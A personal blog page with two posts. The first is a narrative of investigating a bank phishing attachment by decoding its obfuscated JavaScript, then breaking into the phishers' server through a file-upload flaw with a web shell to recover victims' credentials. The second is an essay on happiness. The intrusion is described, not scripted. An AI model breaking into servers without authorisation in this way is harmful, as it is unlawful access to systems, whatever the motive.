August 9, 2017

Phishing in a well

I received an official mail asking to confirm if a mail they have received was a legitimate one, or is something suspicious.
The e-mail had a reply-to address of

The domain is a genuine domain registered by ING Vysya Bank but is not active.
[Note: Click on Images to enlarge] 

Now, I had to check if the e-mail ID really exists.

Without further ado, I started looking into the mail, and it also had an attachment.

I downloaded the attachment (a html file) and opened it in the web browser. It was a (fake) login page of ING Vysya Bank with a form asking for user credentials. I wanted to know where the data would be submitted when a user clicks on the 'Submit' button, so entered random details and clicked on 'Submit' button. I could see in the status bar of my browser that the data is going to some IP and then it was redirecting us to the genuine website of ING Vysya Bank.

So far so good. I just wanted to check if the page was working as it was meant to.

Next step was to see the source code of the html page to find where exactly the data was going on the click of the 'Submit' button.

The source code was obfuscated using the encodeURI() function of JavaScript and on run-time it was being decoded. The source code was Greek to me because of the obfuscation. I had to somehow decode the content to view the source code in clear text. I came to know about the decodeURI() function which was the need of the hour. I used this technique to decode the source code into clear text. The data was double-encoded, so I had to double-decode the content using the unescape() or decodeURI() function to get the clear text, which I finally got after sometime.

Now I knew what exactly I need to look for, in the source code. It was the "<form action>" tag, which along with the request method of "POST" would submit the data to some host.

It was some "".

Great! Now we know where our data is going to.
By the way, you already know that we cannot view the (actual) source code of a php file right?
It pre-processes before displaying the page. So, we can view only the code of the displayed page, but not the code which created the output.

So, now our aim was to see the code of this file "is_vector.php". I did some directory traversals, to browse through various directories, and found a "file upload" vulnerability in some page there, and thats where I fired my favorite madspot shell, and we had access to all the files on that directory and all other sub-directories.

It took some time to find out which directory had that juicy information relevant to this case.
Okay, but first I was interested in identifying the last accessed IP from the access logs, and it was
A quick WHOIS lookup gave the information that the IP belongs to Nigeria. (It could be a proxy or might be used for RDP but anyways thats not what we want to find out, atleast in this case)

Now moving to view the actual source code of the php file "is_vector.php", I traversed through the path to reach the file viewed the source code and found that the data was being mailed to three IDs namely . , and

To know the potential victims of this attack, I would have to hack (get) into the above accounts and check their inboxes for the details they have received.

Luckily, I believe somebody was insecure amongst them and had also added a code in the end of that php file which would also append the data into a text file in some directory there, along with sending the data via their mailer to the above mail IDs.

The mailer was found to be configured by some Heru Kusnadi ( who might be the main person behind this, or could just be another partner in crime.

Uhm, anyways after deep-walking into those dozens of directories, finally I got the data related to the dump of credentials already submitted by some potential victims.

As I was not concerned directly with the victims outside India, I was looking for some data related to Indians. I could find a dozen of valid responses (proper credentials) and luckily they had fortunately or unfortunately filled their genuine mobile numbers too. It was easier for the team to contact and inform them to change their credentials (ATM PIN, transaction password, email password, etc).

By the grace of Almighty, there was no loss to any of our potential victims and they had changed their credentials. They thanked us for the timely help and some of them also burst into tears, but this was out of happiness as some victims had recently transfered their entire savings into this one account of theirs.

What did I get in return? Happiness in their voices, and a feeling of content both individually and also towards the Department which they now trust.
Well, that is more than enough! :)
There was no official complaint as-such but sometimes we take the action like 'Minority Report' ;)

Anyways, If you feel anything suspicious (as in mails, lottery SMSes, etc) kindly report it to your local Cyber Cells via mails atleast or dial 1930 and/or report at

The complete documentation including the "Technical Process" can be provided if you want to study the details. Shoot me a mail.

See you soon.

Greetz to The CliQue - Guy244, GSM50, SajjutXt, KANK, F-roZ, i-maD

The Logical Kid

Disclaimer: Specifically added the mail IDs of the suspects in a searchable method so that it can be indexed on Google when you doubt their mails and search for their e-mail IDs. I hope this post gets displayed in the search results.

August 1, 2017

Happiness - within and around (extended)

Hello! Long time no see right? Hehe, was busy in a couple of tours around the Indian Sub-continent. :D

Well, this post is non-technical and more of a philosophical sort-of, as I have been traveling a lot..and maybe that is when you keep thinking about such stuffs when you gaze over the open skies! :D
This post is neither intended for brainwashing you, nor dominating your mind with my thoughts.
It is just my sole experience, and I hope that you may agree with all or at least some of my thoughts here.
        Sometimes you feel that being rich is the only way of being happy, and for that you work all your life to earn that MONEY which you apparently think that you need it, to be happy.
Don't you think you get many moments of happiness during this journey of yours of getting rich ?
Uhm, let me create a scenario according to your logic of staying happy(ier,iest)

    Assume that you want to buy your dream car and that costs around 30 lakhs (Hey..lets be practical here, and lets ignore your unrealistic range of car worth crores, in this scenario).
So now, you have 30 lakhs, and you are good to go with your dream car.
Next what ?
You still would have dilemmatic thoughts as to buy the car with all the 30 lakhs you have, or settle for something of lesser cost and save the remaining money!

    If you go reluctantly for the 1st choice and go for buying the car with all the money you have, what about the cost to be incurred on the car again ? Fuel, servicing, oh yea.. a good garage for the car ?
Now you start thinking about switching to 'ALL Brand' level, meaning "Everything of a HIGH market value, or standard" and you crave for a good audio system in the car, renovating your place to match the standard of your car.
The point is, you are NOT enjoying the presence of your car and thinking about the other things now.
You are even planning to arrange for a good garage for your car, the audio system, racing decals, and what not!
    Lets assume that you had your car all set-up with the latest audio system and all those seem-to-be-good stuff somehow by your salary, etc.. will you be happy now ?
If you think that you will be happy, its great! Sadly reality is not that way. You will crave for a better car sooner or later.. but for sure.
Statistically, you will be happy for a month, or a couple of them.. and get USED to the comfort and will seek better comfort or a HIGHER standard.
This is a continual process and this keeps on repeating until and unless your desires are controlled.

    Here comes an incident of my life, wherein I realised another fact about happiness.
This happended when I was in my 4th standard.
My parents had come to my school to take some documents pertaining to application of my Passport, and it was all BROADCASTED in my class by my class teacher that I was going to Saudia Arabia and my passport application is being filed.
Everybody was 'all smiles' in my class and suddenly I felt being RICH! It was unexpected for me who never left Hyderabad until then and now was going out of country. :D
        This doesn't end here. Everybody at home also made me feel the same, and I was really very happy and tried behaving in the best manner (something of that sort ) and all that drama.
        I don't remember when this thought of me going to Saudia Arabia disappeared from my mind until my 9th class when actually I went to Saudia Arabia for the first time.
What does this mean now ? I hadn't been to Saudia in my 4th standard itself but the thought itself made me happy, and I already felt as-if I was there.
       A survey also says that people are lot more happier in planning their vacation than going on the vacation itself.
The above survey makes my point stronger now, ain't it ? ;)

    Uhm, I just remembered an incident in my life, which I consider an important event in my life.
I was in my 9th standard and had gone to Saudia Arabia for a vacation.
In earlier days there, I used to go shopping with my papa and was limited to buying few items (yea.. because my frequency of shopping was more :P). 
I used to grab all that was wanted by me. :P

    Then came a day when my papa told me,"Take WHATEVER you want today!"
What next ? Theoretically if anyone tells you so.. you never waste this chance and bump into all nooks and corners of the mall and grab everything you ever wanted to buy.. but on contrary I was PUZZLED as to WHAT I NEED and WHAT TO BUY, as I had freedom to buy everything I wanted that day.
    No! I wasn't getting emotional or I did even think of the prices, no.. nothing! I was a 14 year old kid and was as every other kid who craves for toys and all that fancy shopping!
Then came the enlightenment! I realised that only the words of my papa which literally meant that he can buy ANYTHING for me were more than enough for me.. and equivalent to that ANYTHING.
    Since that day I had a change of my mind and realised that happiness is NOT in BUYING things, it is basically in thinking that YOU can buy it.

    Now, lets assume a different scenario, directly related to MONEY.
During my years of Graduation, my group CliQue had planned for a party at the end of Graduation and we thought of contribution of 5000 Indian Rupees from each one in the group, that would be 35k in total and planned to spend it lavishly at the Taj Hotel.
We would receive scholarship from Government, and so thought we will start saving that for the party.
After completion of our Graduation, though we had a lot more than the planned money, we were satisfied with having "paratha with aaloo" in a local restaurant and tea, roughly amounting to 500 Rupees max.

Let me imagine what would happen if someone would really think of spending all that 35k.
I bet they wouldn't, well atleast according to me who had lived that moment.

Lets consider you really feel that you WILL spend that money no-matter what, and without any second thoughts..
Okay! You spent all that without second thought.. had gala time for an hour, a couple of hours, or say 1 day..!
    Obviously! You would have enjoyed a lot and yeah.. it would have obviously made you HAPPY too.. but what were the elements of happiness basically there ? Your money?

Obviously NO! If money would make you happy, you wouldn't spend them at all! :)
    You were happy because you probably weren't ALONE. You were sharing the enjoyable moments with the people you LIKE, LOVE, or CARE.
So basically YOUR happiness was NOT by your money, but by the HAPPINESS of the people you were with.
    So, the gist of this post is that real happiness is in happiness of the people who matter to you.
Keep spreading happiness, you will never regret this! :)
Hope this post did leave some impact on you!

I firmly believe that what can be bought, can be eventually bought.Afterall it requires only money which can be earned someday. Don't worry about that. Worry about the things which cannot be 'bought'.

Having said that, time for me to wrap it up.

Thanks for reading. Take care! :)
